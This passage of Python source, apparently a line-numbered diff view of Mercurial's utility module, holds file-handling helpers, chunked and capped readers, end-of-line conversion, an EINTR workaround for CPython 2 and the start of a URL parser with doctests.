2264 """unlink and remove the directory if it is empty"""
2259 if ignoremissing:
2265 if ignoremissing:
2260 tryunlink(f)
2266 tryunlink(f)
2261 else:
2267 else:
2262 unlink(f)
2268 unlink(f)
2263 if rmdir:
2269 if rmdir:
2264 # try removing directories that might now be empty
2270 # try removing directories that might now be empty
2265 try:
2271 try:
2266 removedirs(os.path.dirname(f))
2272 removedirs(os.path.dirname(f))
2267 except OSError:
2273 except OSError:
2268 pass
2274 pass
2269
2275
2270 def tryunlink(f):
2276 def tryunlink(f):
2271 """Attempt to remove a file, ignoring ENOENT errors."""
2277 """Attempt to remove a file, ignoring ENOENT errors."""
2272 try:
2278 try:
2273 unlink(f)
2279 unlink(f)
2274 except OSError as e:
2280 except OSError as e:
2275 if e.errno != errno.ENOENT:
2281 if e.errno != errno.ENOENT:
2276 raise
2282 raise
2277
2283
2278 def makedirs(name, mode=None, notindexed=False):
2284 def makedirs(name, mode=None, notindexed=False):
2279 """recursive directory creation with parent mode inheritance
2285 """recursive directory creation with parent mode inheritance
2280
2286
2281 Newly created directories are marked as "not to be indexed by
2287 Newly created directories are marked as "not to be indexed by
2282 the content indexing service", if ``notindexed`` is specified
2288 the content indexing service", if ``notindexed`` is specified
2283 for "write" mode access.
2289 for "write" mode access.
2284 """
2290 """
2285 try:
2291 try:
2286 makedir(name, notindexed)
2292 makedir(name, notindexed)
2287 except OSError as err:
2293 except OSError as err:
2288 if err.errno == errno.EEXIST:
2294 if err.errno == errno.EEXIST:
2289 return
2295 return
2290 if err.errno != errno.ENOENT or not name:
2296 if err.errno != errno.ENOENT or not name:
2291 raise
2297 raise
2292 parent = os.path.dirname(os.path.abspath(name))
2298 parent = os.path.dirname(os.path.abspath(name))
2293 if parent == name:
2299 if parent == name:
2294 raise
2300 raise
2295 makedirs(parent, mode, notindexed)
2301 makedirs(parent, mode, notindexed)
2296 try:
2302 try:
2297 makedir(name, notindexed)
2303 makedir(name, notindexed)
2298 except OSError as err:
2304 except OSError as err:
2299 # Catch EEXIST to handle races
2305 # Catch EEXIST to handle races
2300 if err.errno == errno.EEXIST:
2306 if err.errno == errno.EEXIST:
2301 return
2307 return
2302 raise
2308 raise
2303 if mode is not None:
2309 if mode is not None:
2304 os.chmod(name, mode)
2310 os.chmod(name, mode)
2305
2311
2306 def readfile(path):
2312 def readfile(path):
2307 with open(path, 'rb') as fp:
2313 with open(path, 'rb') as fp:
2308 return fp.read()
2314 return fp.read()
2309
2315
2310 def writefile(path, text):
2316 def writefile(path, text):
2311 with open(path, 'wb') as fp:
2317 with open(path, 'wb') as fp:
2312 fp.write(text)
2318 fp.write(text)
2313
2319
2314 def appendfile(path, text):
2320 def appendfile(path, text):
2315 with open(path, 'ab') as fp:
2321 with open(path, 'ab') as fp:
2316 fp.write(text)
2322 fp.write(text)
2317
2323
2318 class chunkbuffer(object):
2324 class chunkbuffer(object):
2319 """Allow arbitrary sized chunks of data to be efficiently read from an
2325 """Allow arbitrary sized chunks of data to be efficiently read from an
2320 iterator over chunks of arbitrary size."""
2326 iterator over chunks of arbitrary size."""
2321
2327
2322 def __init__(self, in_iter):
2328 def __init__(self, in_iter):
2323 """in_iter is the iterator that's iterating over the input chunks."""
2329 """in_iter is the iterator that's iterating over the input chunks."""
2324 def splitbig(chunks):
2330 def splitbig(chunks):
2325 for chunk in chunks:
2331 for chunk in chunks:
2326 if len(chunk) > 2**20:
2332 if len(chunk) > 2**20:
2327 pos = 0
2333 pos = 0
2328 while pos < len(chunk):
2334 while pos < len(chunk):
2329 end = pos + 2 ** 18
2335 end = pos + 2 ** 18
2330 yield chunk[pos:end]
2336 yield chunk[pos:end]
2331 pos = end
2337 pos = end
2332 else:
2338 else:
2333 yield chunk
2339 yield chunk
2334 self.iter = splitbig(in_iter)
2340 self.iter = splitbig(in_iter)
2335 self._queue = collections.deque()
2341 self._queue = collections.deque()
2336 self._chunkoffset = 0
2342 self._chunkoffset = 0
2337
2343
2338 def read(self, l=None):
2344 def read(self, l=None):
2339 """Read L bytes of data from the iterator of chunks of data.
2345 """Read L bytes of data from the iterator of chunks of data.
2340 Returns less than L bytes if the iterator runs dry.
2346 Returns less than L bytes if the iterator runs dry.
2341
2347
2342 If size parameter is omitted, read everything"""
2348 If size parameter is omitted, read everything"""
2343 if l is None:
2349 if l is None:
2344 return ''.join(self.iter)
2350 return ''.join(self.iter)
2345
2351
2346 left = l
2352 left = l
2347 buf = []
2353 buf = []
2348 queue = self._queue
2354 queue = self._queue
2349 while left > 0:
2355 while left > 0:
2350 # refill the queue
2356 # refill the queue
2351 if not queue:
2357 if not queue:
2352 target = 2**18
2358 target = 2**18
2353 for chunk in self.iter:
2359 for chunk in self.iter:
2354 queue.append(chunk)
2360 queue.append(chunk)
2355 target -= len(chunk)
2361 target -= len(chunk)
2356 if target <= 0:
2362 if target <= 0:
2357 break
2363 break
2358 if not queue:
2364 if not queue:
2359 break
2365 break
2360
2366
2361 # The easy way to do this would be to queue.popleft(), modify the
2367 # The easy way to do this would be to queue.popleft(), modify the
2362 # chunk (if necessary), then queue.appendleft(). However, for cases
2368 # chunk (if necessary), then queue.appendleft(). However, for cases
2363 # where we read partial chunk content, this incurs 2 dequeue
2369 # where we read partial chunk content, this incurs 2 dequeue
2364 # mutations and creates a new str for the remaining chunk in the
2370 # mutations and creates a new str for the remaining chunk in the
2365 # queue. Our code below avoids this overhead.
2371 # queue. Our code below avoids this overhead.
2366
2372
2367 chunk = queue[0]
2373 chunk = queue[0]
2368 chunkl = len(chunk)
2374 chunkl = len(chunk)
2369 offset = self._chunkoffset
2375 offset = self._chunkoffset
2370
2376
2371 # Use full chunk.
2377 # Use full chunk.
2372 if offset == 0 and left >= chunkl:
2378 if offset == 0 and left >= chunkl:
2373 left -= chunkl
2379 left -= chunkl
2374 queue.popleft()
2380 queue.popleft()
2375 buf.append(chunk)
2381 buf.append(chunk)
2376 # self._chunkoffset remains at 0.
2382 # self._chunkoffset remains at 0.
2377 continue
2383 continue
2378
2384
2379 chunkremaining = chunkl - offset
2385 chunkremaining = chunkl - offset
2380
2386
2381 # Use all of unconsumed part of chunk.
2387 # Use all of unconsumed part of chunk.
2382 if left >= chunkremaining:
2388 if left >= chunkremaining:
2383 left -= chunkremaining
2389 left -= chunkremaining
2384 queue.popleft()
2390 queue.popleft()
2385 # offset == 0 is enabled by block above, so this won't merely
2391 # offset == 0 is enabled by block above, so this won't merely
2386 # copy via ``chunk[0:]``.
2392 # copy via ``chunk[0:]``.
2387 buf.append(chunk[offset:])
2393 buf.append(chunk[offset:])
2388 self._chunkoffset = 0
2394 self._chunkoffset = 0
2389
2395
2390 # Partial chunk needed.
2396 # Partial chunk needed.
2391 else:
2397 else:
2392 buf.append(chunk[offset:offset + left])
2398 buf.append(chunk[offset:offset + left])
2393 self._chunkoffset += left
2399 self._chunkoffset += left
2394 left -= chunkremaining
2400 left -= chunkremaining
2395
2401
2396 return ''.join(buf)
2402 return ''.join(buf)
2397
2403
2398 def filechunkiter(f, size=131072, limit=None):
2404 def filechunkiter(f, size=131072, limit=None):
2399 """Create a generator that produces the data in the file size
2405 """Create a generator that produces the data in the file size
2400 (default 131072) bytes at a time, up to optional limit (default is
2406 (default 131072) bytes at a time, up to optional limit (default is
2401 to read all data). Chunks may be less than size bytes if the
2407 to read all data). Chunks may be less than size bytes if the
2402 chunk is the last chunk in the file, or the file is a socket or
2408 chunk is the last chunk in the file, or the file is a socket or
2403 some other type of file that sometimes reads less data than is
2409 some other type of file that sometimes reads less data than is
2404 requested."""
2410 requested."""
2405 assert size >= 0
2411 assert size >= 0
2406 assert limit is None or limit >= 0
2412 assert limit is None or limit >= 0
2407 while True:
2413 while True:
2408 if limit is None:
2414 if limit is None:
2409 nbytes = size
2415 nbytes = size
2410 else:
2416 else:
2411 nbytes = min(limit, size)
2417 nbytes = min(limit, size)
2412 s = nbytes and f.read(nbytes)
2418 s = nbytes and f.read(nbytes)
2413 if not s:
2419 if not s:
2414 break
2420 break
2415 if limit:
2421 if limit:
2416 limit -= len(s)
2422 limit -= len(s)
2417 yield s
2423 yield s
2418
2424
2419 class cappedreader(object):
2425 class cappedreader(object):
2420 """A file object proxy that allows reading up to N bytes.
2426 """A file object proxy that allows reading up to N bytes.
2421
2427
2422 Given a source file object, instances of this type allow reading up to
2428 Given a source file object, instances of this type allow reading up to
2423 N bytes from that source file object. Attempts to read past the allowed
2429 N bytes from that source file object. Attempts to read past the allowed
2424 limit are treated as EOF.
2430 limit are treated as EOF.
2425
2431
2426 It is assumed that I/O is not performed on the original file object
2432 It is assumed that I/O is not performed on the original file object
2427 in addition to I/O that is performed by this instance. If there is,
2433 in addition to I/O that is performed by this instance. If there is,
2428 state tracking will get out of sync and unexpected results will ensue.
2434 state tracking will get out of sync and unexpected results will ensue.
2429 """
2435 """
2430 def __init__(self, fh, limit):
2436 def __init__(self, fh, limit):
2431 """Allow reading up to <limit> bytes from <fh>."""
2437 """Allow reading up to <limit> bytes from <fh>."""
2432 self._fh = fh
2438 self._fh = fh
2433 self._left = limit
2439 self._left = limit
2434
2440
2435 def read(self, n=-1):
2441 def read(self, n=-1):
2436 if not self._left:
2442 if not self._left:
2437 return b''
2443 return b''
2438
2444
2439 if n < 0:
2445 if n < 0:
2440 n = self._left
2446 n = self._left
2441
2447
2442 data = self._fh.read(min(n, self._left))
2448 data = self._fh.read(min(n, self._left))
2443 self._left -= len(data)
2449 self._left -= len(data)
2444 assert self._left >= 0
2450 assert self._left >= 0
2445
2451
2446 return data
2452 return data
2447
2453
2448 def readinto(self, b):
2454 def readinto(self, b):
2449 res = self.read(len(b))
2455 res = self.read(len(b))
2450 if res is None:
2456 if res is None:
2451 return None
2457 return None
2452
2458
2453 b[0:len(res)] = res
2459 b[0:len(res)] = res
2454 return len(res)
2460 return len(res)
2455
2461
2456 def unitcountfn(*unittable):
2462 def unitcountfn(*unittable):
2457 '''return a function that renders a readable count of some quantity'''
2463 '''return a function that renders a readable count of some quantity'''
2458
2464
2459 def go(count):
2465 def go(count):
2460 for multiplier, divisor, format in unittable:
2466 for multiplier, divisor, format in unittable:
2461 if abs(count) >= divisor * multiplier:
2467 if abs(count) >= divisor * multiplier:
2462 return format % (count / float(divisor))
2468 return format % (count / float(divisor))
2463 return unittable[-1][2] % count
2469 return unittable[-1][2] % count
2464
2470
2465 return go
2471 return go
2466
2472
2467 def processlinerange(fromline, toline):
2473 def processlinerange(fromline, toline):
2468 """Check that linerange <fromline>:<toline> makes sense and return a
2474 """Check that linerange <fromline>:<toline> makes sense and return a
2469 0-based range.
2475 0-based range.
2470
2476
2471 >>> processlinerange(10, 20)
2477 >>> processlinerange(10, 20)
2472 (9, 20)
2478 (9, 20)
2473 >>> processlinerange(2, 1)
2479 >>> processlinerange(2, 1)
2474 Traceback (most recent call last):
2480 Traceback (most recent call last):
2475 ...
2481 ...
2476 ParseError: line range must be positive
2482 ParseError: line range must be positive
2477 >>> processlinerange(0, 5)
2483 >>> processlinerange(0, 5)
2478 Traceback (most recent call last):
2484 Traceback (most recent call last):
2479 ...
2485 ...
2480 ParseError: fromline must be strictly positive
2486 ParseError: fromline must be strictly positive
2481 """
2487 """
2482 if toline - fromline < 0:
2488 if toline - fromline < 0:
2483 raise error.ParseError(_("line range must be positive"))
2489 raise error.ParseError(_("line range must be positive"))
2484 if fromline < 1:
2490 if fromline < 1:
2485 raise error.ParseError(_("fromline must be strictly positive"))
2491 raise error.ParseError(_("fromline must be strictly positive"))
2486 return fromline - 1, toline
2492 return fromline - 1, toline
2487
2493
2488 bytecount = unitcountfn(
2494 bytecount = unitcountfn(
2489 (100, 1 << 30, _('%.0f GB')),
2495 (100, 1 << 30, _('%.0f GB')),
2490 (10, 1 << 30, _('%.1f GB')),
2496 (10, 1 << 30, _('%.1f GB')),
2491 (1, 1 << 30, _('%.2f GB')),
2497 (1, 1 << 30, _('%.2f GB')),
2492 (100, 1 << 20, _('%.0f MB')),
2498 (100, 1 << 20, _('%.0f MB')),
2493 (10, 1 << 20, _('%.1f MB')),
2499 (10, 1 << 20, _('%.1f MB')),
2494 (1, 1 << 20, _('%.2f MB')),
2500 (1, 1 << 20, _('%.2f MB')),
2495 (100, 1 << 10, _('%.0f KB')),
2501 (100, 1 << 10, _('%.0f KB')),
2496 (10, 1 << 10, _('%.1f KB')),
2502 (10, 1 << 10, _('%.1f KB')),
2497 (1, 1 << 10, _('%.2f KB')),
2503 (1, 1 << 10, _('%.2f KB')),
2498 (1, 1, _('%.0f bytes')),
2504 (1, 1, _('%.0f bytes')),
2499 )
2505 )
2500
2506
2501 class transformingwriter(object):
2507 class transformingwriter(object):
2502 """Writable file wrapper to transform data by function"""
2508 """Writable file wrapper to transform data by function"""
2503
2509
2504 def __init__(self, fp, encode):
2510 def __init__(self, fp, encode):
2505 self._fp = fp
2511 self._fp = fp
2506 self._encode = encode
2512 self._encode = encode
2507
2513
2508 def close(self):
2514 def close(self):
2509 self._fp.close()
2515 self._fp.close()
2510
2516
2511 def flush(self):
2517 def flush(self):
2512 self._fp.flush()
2518 self._fp.flush()
2513
2519
2514 def write(self, data):
2520 def write(self, data):
2515 return self._fp.write(self._encode(data))
2521 return self._fp.write(self._encode(data))
2516
2522
2517 # Matches a single EOL which can either be a CRLF where repeated CR
2523 # Matches a single EOL which can either be a CRLF where repeated CR
2518 # are removed or a LF. We do not care about old Macintosh files, so a
2524 # are removed or a LF. We do not care about old Macintosh files, so a
2519 # stray CR is an error.
2525 # stray CR is an error.
2520 _eolre = remod.compile(br'\r*\n')
2526 _eolre = remod.compile(br'\r*\n')
2521
2527
2522 def tolf(s):
2528 def tolf(s):
2523 return _eolre.sub('\n', s)
2529 return _eolre.sub('\n', s)
2524
2530
2525 def tocrlf(s):
2531 def tocrlf(s):
2526 return _eolre.sub('\r\n', s)
2532 return _eolre.sub('\r\n', s)
2527
2533
2528 def _crlfwriter(fp):
2534 def _crlfwriter(fp):
2529 return transformingwriter(fp, tocrlf)
2535 return transformingwriter(fp, tocrlf)
2530
2536
2531 if pycompat.oslinesep == '\r\n':
2537 if pycompat.oslinesep == '\r\n':
2532 tonativeeol = tocrlf
2538 tonativeeol = tocrlf
2533 fromnativeeol = tolf
2539 fromnativeeol = tolf
2534 nativeeolwriter = _crlfwriter
2540 nativeeolwriter = _crlfwriter
2535 else:
2541 else:
2536 tonativeeol = pycompat.identity
2542 tonativeeol = pycompat.identity
2537 fromnativeeol = pycompat.identity
2543 fromnativeeol = pycompat.identity
2538 nativeeolwriter = pycompat.identity
2544 nativeeolwriter = pycompat.identity
2539
2545
2540 if (pyplatform.python_implementation() == 'CPython' and
2546 if (pyplatform.python_implementation() == 'CPython' and
2541 sys.version_info < (3, 0)):
2547 sys.version_info < (3, 0)):
2542 # There is an issue in CPython that some IO methods do not handle EINTR
2548 # There is an issue in CPython that some IO methods do not handle EINTR
2543 # correctly. The following table shows what CPython version (and functions)
2549 # correctly. The following table shows what CPython version (and functions)
2544 # are affected (buggy: has the EINTR bug, okay: otherwise):
2550 # are affected (buggy: has the EINTR bug, okay: otherwise):
2545 #
2551 #
2546 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2552 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2547 # --------------------------------------------------
2553 # --------------------------------------------------
2548 # fp.__iter__ | buggy | buggy | okay
2554 # fp.__iter__ | buggy | buggy | okay
2549 # fp.read* | buggy | okay [1] | okay
2555 # fp.read* | buggy | okay [1] | okay
2550 #
2556 #
2551 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2557 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2552 #
2558 #
2553 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2559 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2554 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2560 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2555 #
2561 #
2556 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2562 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2557 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2563 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2558 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2564 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2559 # fp.__iter__ but not other fp.read* methods.
2565 # fp.__iter__ but not other fp.read* methods.
2560 #
2566 #
2561 # On modern systems like Linux, the "read" syscall cannot be interrupted
2567 # On modern systems like Linux, the "read" syscall cannot be interrupted
2562 # when reading "fast" files like on-disk files. So the EINTR issue only
2568 # when reading "fast" files like on-disk files. So the EINTR issue only
2563 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2569 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2564 # files approximately as "fast" files and use the fast (unsafe) code path,
2570 # files approximately as "fast" files and use the fast (unsafe) code path,
2565 # to minimize the performance impact.
2571 # to minimize the performance impact.
2566 if sys.version_info >= (2, 7, 4):
2572 if sys.version_info >= (2, 7, 4):
2567 # fp.readline deals with EINTR correctly, use it as a workaround.
2573 # fp.readline deals with EINTR correctly, use it as a workaround.
2568 def _safeiterfile(fp):
2574 def _safeiterfile(fp):
2569 return iter(fp.readline, '')
2575 return iter(fp.readline, '')
2570 else:
2576 else:
2571 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2577 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2572 # note: this may block longer than necessary because of bufsize.
2578 # note: this may block longer than necessary because of bufsize.
2573 def _safeiterfile(fp, bufsize=4096):
2579 def _safeiterfile(fp, bufsize=4096):
2574 fd = fp.fileno()
2580 fd = fp.fileno()
2575 line = ''
2581 line = ''
2576 while True:
2582 while True:
2577 try:
2583 try:
2578 buf = os.read(fd, bufsize)
2584 buf = os.read(fd, bufsize)
2579 except OSError as ex:
2585 except OSError as ex:
2580 # os.read only raises EINTR before any data is read
2586 # os.read only raises EINTR before any data is read
2581 if ex.errno == errno.EINTR:
2587 if ex.errno == errno.EINTR:
2582 continue
2588 continue
2583 else:
2589 else:
2584 raise
2590 raise
2585 line += buf
2591 line += buf
2586 if '\n' in buf:
2592 if '\n' in buf:
2587 splitted = line.splitlines(True)
2593 splitted = line.splitlines(True)
2588 line = ''
2594 line = ''
2589 for l in splitted:
2595 for l in splitted:
2590 if l[-1] == '\n':
2596 if l[-1] == '\n':
2591 yield l
2597 yield l
2592 else:
2598 else:
2593 line = l
2599 line = l
2594 if not buf:
2600 if not buf:
2595 break
2601 break
2596 if line:
2602 if line:
2597 yield line
2603 yield line
2598
2604
2599 def iterfile(fp):
2605 def iterfile(fp):
2600 fastpath = True
2606 fastpath = True
2601 if type(fp) is file:
2607 if type(fp) is file:
2602 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2608 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2603 if fastpath:
2609 if fastpath:
2604 return fp
2610 return fp
2605 else:
2611 else:
2606 return _safeiterfile(fp)
2612 return _safeiterfile(fp)
2607 else:
2613 else:
2608 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2614 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2609 def iterfile(fp):
2615 def iterfile(fp):
2610 return fp
2616 return fp
2611
2617
2612 def iterlines(iterator):
2618 def iterlines(iterator):
2613 for chunk in iterator:
2619 for chunk in iterator:
2614 for line in chunk.splitlines():
2620 for line in chunk.splitlines():
2615 yield line
2621 yield line
2616
2622
2617 def expandpath(path):
2623 def expandpath(path):
2618 return os.path.expanduser(os.path.expandvars(path))
2624 return os.path.expanduser(os.path.expandvars(path))
2619
2625
2620 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2626 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2621 """Return the result of interpolating items in the mapping into string s.
2627 """Return the result of interpolating items in the mapping into string s.
2622
2628
2623 prefix is a single character string, or a two character string with
2629 prefix is a single character string, or a two character string with
2624 a backslash as the first character if the prefix needs to be escaped in
2630 a backslash as the first character if the prefix needs to be escaped in
2625 a regular expression.
2631 a regular expression.
2626
2632
2627 fn is an optional function that will be applied to the replacement text
2633 fn is an optional function that will be applied to the replacement text
2628 just before replacement.
2634 just before replacement.
2629
2635
2630 escape_prefix is an optional flag that allows using doubled prefix for
2636 escape_prefix is an optional flag that allows using doubled prefix for
2631 its escaping.
2637 its escaping.
2632 """
2638 """
2633 fn = fn or (lambda s: s)
2639 fn = fn or (lambda s: s)
2634 patterns = '|'.join(mapping.keys())
2640 patterns = '|'.join(mapping.keys())
2635 if escape_prefix:
2641 if escape_prefix:
2636 patterns += '|' + prefix
2642 patterns += '|' + prefix
2637 if len(prefix) > 1:
2643 if len(prefix) > 1:
2638 prefix_char = prefix[1:]
2644 prefix_char = prefix[1:]
2639 else:
2645 else:
2640 prefix_char = prefix
2646 prefix_char = prefix
2641 mapping[prefix_char] = prefix_char
2647 mapping[prefix_char] = prefix_char
2642 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2648 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2643 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2649 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2644
2650
2645 def getport(port):
2651 def getport(port):
2646 """Return the port for a given network service.
2652 """Return the port for a given network service.
2647
2653
2648 If port is an integer, it's returned as is. If it's a string, it's
2654 If port is an integer, it's returned as is. If it's a string, it's
2649 looked up using socket.getservbyname(). If there's no matching
2655 looked up using socket.getservbyname(). If there's no matching
2650 service, error.Abort is raised.
2656 service, error.Abort is raised.
2651 """
2657 """
2652 try:
2658 try:
2653 return int(port)
2659 return int(port)
2654 except ValueError:
2660 except ValueError:
2655 pass
2661 pass
2656
2662
2657 try:
2663 try:
2658 return socket.getservbyname(pycompat.sysstr(port))
2664 return socket.getservbyname(pycompat.sysstr(port))
2659 except socket.error:
2665 except socket.error:
2660 raise error.Abort(_("no port number associated with service '%s'")
2666 raise error.Abort(_("no port number associated with service '%s'")
2661 % port)
2667 % port)
2662
2668
2663 class url(object):
2669 class url(object):
2664 r"""Reliable URL parser.
2670 r"""Reliable URL parser.
2665
2671
2666 This parses URLs and provides attributes for the following
2672 This parses URLs and provides attributes for the following
2667 components:
2673 components:
2668
2674
2669 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2675 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2670
2676
2671 Missing components are set to None. The only exception is
2677 Missing components are set to None. The only exception is
2672 fragment, which is set to '' if present but empty.
2678 fragment, which is set to '' if present but empty.
2673
2679
2674 If parsefragment is False, fragment is included in query. If
2680 If parsefragment is False, fragment is included in query. If
2675 parsequery is False, query is included in path. If both are
2681 parsequery is False, query is included in path. If both are
2676 False, both fragment and query are included in path.
2682 False, both fragment and query are included in path.
2677
2683
2678 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2684 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2679
2685
2680 Note that for backward compatibility reasons, bundle URLs do not
2686 Note that for backward compatibility reasons, bundle URLs do not
2681 take host names. That means 'bundle://../' has a path of '../'.
2687 take host names. That means 'bundle://../' has a path of '../'.
2682
2688
2683 Examples:
2689 Examples:
2684
2690
2685 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2691 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2686 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2692 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2687 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2693 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2688 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2694 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2689 >>> url(b'file:///home/joe/repo')
2695 >>> url(b'file:///home/joe/repo')
2690 <url scheme: 'file', path: '/home/joe/repo'>
2696 <url scheme: 'file', path: '/home/joe/repo'>
2691 >>> url(b'file:///c:/temp/foo/')
2697 >>> url(b'file:///c:/temp/foo/')
2692 <url scheme: 'file', path: 'c:/temp/foo/'>
2698 <url scheme: 'file', path: 'c:/temp/foo/'>
2693 >>> url(b'bundle:foo')
2699 >>> url(b'bundle:foo')
2694 <url scheme: 'bundle', path: 'foo'>
2700 <url scheme: 'bundle', path: 'foo'>
2695 >>> url(b'bundle://../foo')
2701 >>> url(b'bundle://../foo')
2696 <url scheme: 'bundle', path: '../foo'>
2702 <url scheme: 'bundle', path: '../foo'>
2697 >>> url(br'c:\foo\bar')
2703 >>> url(br'c:\foo\bar')
2698 <url path: 'c:\\foo\\bar'>
2704 <url path: 'c:\\foo\\bar'>
2699 >>> url(br'\\blah\blah\blah')
2705 >>> url(br'\\blah\blah\blah')
2700 <url path: '\\\\blah\\blah\\blah'>
2706 <url path: '\\\\blah\\blah\\blah'>
2701 >>> url(br'\\blah\blah\blah#baz')
2707 >>> url(br'\\blah\blah\blah#baz')
2702 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2708 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2703 >>> url(br'file:///C:\users\me')
2709 >>> url(br'file:///C:\users\me')
2704 <url scheme: 'file', path: 'C:\\users\\me'>
2710 <url scheme: 'file', path: 'C:\\users\\me'>
2705
2711
2706 Authentication credentials:
2712 Authentication credentials:
2707
2713
2708 >>> url(b'ssh://joe:xyz@x/repo')
2714 >>> url(b'ssh://joe:xyz@x/repo')
2709 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2715 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2710 >>> url(b'ssh://joe@x/repo')
2716 >>> url(b'ssh://joe@x/repo')
2711 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2717 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2712
2718
2713 Query strings and fragments:
2719 Query strings and fragments:
2714
2720
2715 >>> url(b'http://host/a?b#c')
2721 >>> url(b'http://host/a?b#c')
2716 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2722 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2717 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2723 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2718 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2724 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2719
2725
2720 Empty path:
2726 Empty path:
2721
2727
2722 >>> url(b'')
2728 >>> url(b'')
2723 <url path: ''>
2729 <url path: ''>
2724 >>> url(b'#a')
2730 >>> url(b'#a')
2725 <url path: '', fragment: 'a'>
2731 <url path: '', fragment: 'a'>
2726 >>> url(b'http://host/')
2732 >>> url(b'http://host/')
2727 <url scheme: 'http', host: 'host', path: ''>
2733 <url scheme: 'http', host: 'host', path: ''>
2728 >>> url(b'http://host/#a')
2734 >>> url(b'http://host/#a')
2729 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2735 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2730
2736
2731 Only scheme:
2737 Only scheme:
2732
2738
2733 >>> url(b'http:')
2739 >>> url(b'http:')
2734 <url scheme: 'http'>
2740 <url scheme: 'http'>
2735 """
2741 """
2736
2742
2737 _safechars = "!~*'()+"
2743 _safechars = "!~*'()+"
2738 _safepchars = "/!~*'()+:\\"
2744 _safepchars = "/!~*'()+:\\"
2739 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2745 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2740
2746
2741 def __init__(self, path, parsequery=True, parsefragment=True):
2747 def __init__(self, path, parsequery=True, parsefragment=True):
2742 # We slowly chomp away at path until we have only the path left
2748 # We slowly chomp away at path until we have only the path left
2743 self.scheme = self.user = self.passwd = self.host = None
2749 self.scheme = self.user = self.passwd = self.host = None
2744 self.port = self.path = self.query = self.fragment = None
2750 self.port = self.path = self.query = self.fragment = None
2745 self._localpath = True
2751 self._localpath = True
2746 self._hostport = ''
2752 self._hostport = ''
2747 self._origpath = path
2753 self._origpath = path
2748
2754
2749 if parsefragment and '#' in path:
2755 if parsefragment and '#' in path:
2750 path, self.fragment = path.split('#', 1)
2756 path, self.fragment = path.split('#', 1)
2751
2757
2752 # special case for Windows drive letters and UNC paths
2758 # special case for Windows drive letters and UNC paths
2753 if hasdriveletter(path) or path.startswith('\\\\'):
2759 if hasdriveletter(path) or path.startswith('\\\\'):
2754 self.path = path
2760 self.path = path
2755 return
2761 return
2756
2762
2757 # For compatibility reasons, we can't handle bundle paths as
2763 # For compatibility reasons, we can't handle bundle paths as
2758 # normal URLS
2764 # normal URLS
2759 if path.startswith('bundle:'):
2765 if path.startswith('bundle:'):
2760 self.scheme = 'bundle'
2766 self.scheme = 'bundle'
2761 path = path[7:]
2767 path = path[7:]
2762 if path.startswith('//'):
2768 if path.startswith('//'):
2763 path = path[2:]
2769 path = path[2:]
2764 self.path = path
2770 self.path = path
2765 return
2771 return
2766
2772
2767 if self._matchscheme(path):
2773 if self._matchscheme(path):
2768 parts = path.split(':', 1)
2774 parts = path.split(':', 1)
2769 if parts[0]:
2775 if parts[0]:
2770 self.scheme, path = parts
2776 self.scheme, path = parts
2771 self._localpath = False
2777 self._localpath = False
2772
2778
2773 if not path:
2779 if not path:
2774 path = None
2780 path = None
2775 if self._localpath:
2781 if self._localpath:
2776 self.path = ''
2782 self.path = ''
2777 return
2783 return
2778 else:
2784 else:
